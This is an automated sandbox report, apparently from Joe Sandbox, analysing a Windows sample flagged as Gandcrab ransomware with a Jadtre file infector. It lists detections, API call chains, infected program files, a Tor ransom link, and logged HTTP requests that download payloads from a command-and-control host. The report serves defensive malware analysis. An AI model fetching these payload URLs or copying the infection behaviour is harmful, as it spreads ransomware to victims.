Windows Analysis Report
SY5DeZW6pz.exe

Overview

General Information

Sample Name: SY5DeZW6pz.exe
Analysis ID: 694552
MD5: 536f2c1238ef65a64820c35d4504ce67
SHA1: 7806d51132e40728f581374a9d72d9713bff2dd0
SHA256: b6a71449958283718f01e6be9f7a9eb057479072c1cc55f26a11b033ea210271
Tags: exe

Detection

Gandcrab, ReflectiveLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Gandcrab
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected ReflectiveLoader
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Found evasive API chain (may stop execution after checking mutex)
Infects executable files (exe, dll, sys, html)
Contains functionality to determine the online IP of the system
Found Tor onion address
PE file has a writeable .text section
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Machine Learning detection for dropped file
PE file contains section with special chars
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to dynamically determine API calls
Uses the system / local time for branch decision (may execute only at specific dates)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
PE file contains more sections than normal
Contains functionality to enumerate device drivers
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider

AV Detection

Source: SY5DeZW6pz.exe Virustotal: Detection: 81%
Source: SY5DeZW6pz.exe Metadefender: Detection: 65%
Source: SY5DeZW6pz.exe ReversingLabs: Detection: 95%
Source: SY5DeZW6pz.exe Avira: detected
Source: http://ddos.dnsnb8.net:799/cj//k3.rar% Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rar Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar% Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net/& Avira URL Cloud: Label: malware
Source: ddos.dnsnb8.net Virustotal: Detection: 5%
Source: http://ddos.dnsnb8.net:799/cj//k3.rar Virustotal: Detection: 6%
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Metadefender: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe ReversingLabs: Detection: 100%
Source: SY5DeZW6pz.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Joe Sandbox ML: detected
Source: 1.0.vSQshX.exe.c20000.3.unpack Avira: Label: W32/Jadtre.D
Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack Avira: Label: W32/Jadtre.B
Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack Avira: Label: W32/Jadtre.B
Source: 1.0.vSQshX.exe.c20000.0.unpack Avira: Label: W32/Jadtre.D
Source: 1.2.vSQshX.exe.c20000.0.unpack Avira: Label: W32/Jadtre.D
Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack Avira: Label: W32/Jadtre.B
Source: 1.0.vSQshX.exe.c20000.1.unpack Avira: Label: W32/Jadtre.D
Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack Avira: Label: W32/Jadtre.B
Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack Avira: Label: W32/Jadtre.B
Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack Avira: Label: W32/Jadtre.B
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F394950 Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread, 0_2_0F394950
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F398150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree, 0_2_0F398150
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F3962B0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW, 0_2_0F3962B0
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F396530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection, 0_2_0F396530
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F395210 lstrlenA,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError, 0_2_0F395210
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F395670 VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenW,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree, 0_2_0F395670
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F3982A0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree, 0_2_0F3982A0
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F395880 VirtualAlloc,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenA,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree, 0_2_0F395880
Source: SY5DeZW6pz.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SY5DeZW6pz.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH

Spreading

Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateComRegisterShell64.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\chrome_pwa_launcher.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdate.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\lync.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\misc.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\filecompare.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\lync99.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\AutoIt3Help.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\ssvagent.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\UcMapi.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ONENOTE.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\PDFREFLOW.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\WINWORD.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroBroker.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOSREC.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\OUTLOOK.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\Common.DBConnection.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\protocolhandler.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSQRY32.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\wow_helper.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\notification_helper.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\arh.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\SELFCERT.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX45.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\WORDICON.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSPUB.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleCrashHandler64.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\chrome.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\jabswitch.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\DATABASECOMPARE.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleCrashHandler.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\SETLANG.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ACCICONS.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\FIRSTRUN.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSACCESS.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\POWERPNT.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateCore.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\Common.ShowHelp.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\SCANPST.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Au3Check.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\jp2launcher.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOHTMED.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\CLVIEW.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\NAMECONTROLSERVER.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\IEContentService.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\java.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\CNFNOT32.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\Installer\chrmstp.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Microsoft Office\Office16\AppSharingHookController64.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\excelcnv.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\GROOVE.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\OcPubMgr.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\java-rmi.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateBroker.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\unpack200.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\javacpl.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ONENOTEM.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\AcroLayoutRecognizer.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\msoev.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOUC.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Microsoft Office\Office16\MSOHTMED.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\GRAPH.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\EXCEL.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\PPTICO.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\LogTransport2.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\lynchtmlconv.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\javaws.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\elevation_service.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\Eula.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Au3Info.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\AutoIt3_x64.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\AppSharingHookController.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\OSPPREARM.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOSYNC.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\XLICONS.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\Common.DBConnection64.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Microsoft Office\Office16\msoia.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\104.0.5112.81\chrome_installer.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Au3Info_x64.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\Wordconv.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Aut2Exe\Aut2exe.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\SPREADSHEETCOMPARE.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft analysis services\AS OLEDB\110\SQLDumper.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\VPREVIEW.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\reader_sl.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Aut2Exe\upx.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateSetup.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\msotd.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\orbd.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F396A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose, 0_2_0F396A40
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F396C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose, 0_2_0F396C90
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C229E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpi,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpi,FindNextFileA,FindClose, 1_2_00C229E2
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C22B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 1_2_00C22B8C
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe

Networking

Source: Traffic Snort IDS: 2838522 ETPRO TROJAN Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup 192.168.2.4:58565 -> 8.8.8.8:53
Source: Traffic Snort IDS: 2807908 ETPRO TROJAN Backdoor.Win32/Bdaejec.A Checkin 192.168.2.4:49707 -> 63.251.106.25:799
Source: Traffic Snort IDS: 2807908 ETPRO TROJAN Backdoor.Win32/Bdaejec.A Checkin 192.168.2.4:49708 -> 63.251.106.25:799
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F396E90 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com 0_2_0F396E90
Source: SY5DeZW6pz.exe, 00000000.00000000.307805000.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
Source: SY5DeZW6pz.exe, 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
Source: SY5DeZW6pz.exe String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 799
Source: Joe Sandbox View ASN Name: VOXEL-DOT-NETUS
Source: Joe Sandbox View IP Address: 63.251.106.25
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: ddos.dnsnb8.net:799 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: ddos.dnsnb8.net:799 | Connection: Keep-Alive
Source: global traffic TCP traffic: 192.168.2.4:49707 -> 63.251.106.25:799
